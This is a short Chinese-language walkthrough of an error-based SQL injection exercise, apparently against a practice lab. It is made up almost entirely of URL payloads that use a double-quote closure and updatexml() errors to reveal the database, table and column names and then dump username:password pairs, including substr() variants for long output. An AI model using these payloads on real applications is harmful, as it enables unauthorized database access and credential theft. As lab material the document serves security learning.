0、初始网页
1、确定闭合字符
确定闭合字符为双引号
?id=1 and 1=1
?id=1 and 1=2
?id=1"
2、爆库名
?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
3、爆表名
?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
4、爆列名
?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)--+
5、查询最终目标
?id=1" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) --+
?id=1" and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) --+
?id=1" and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),32,64),1) --+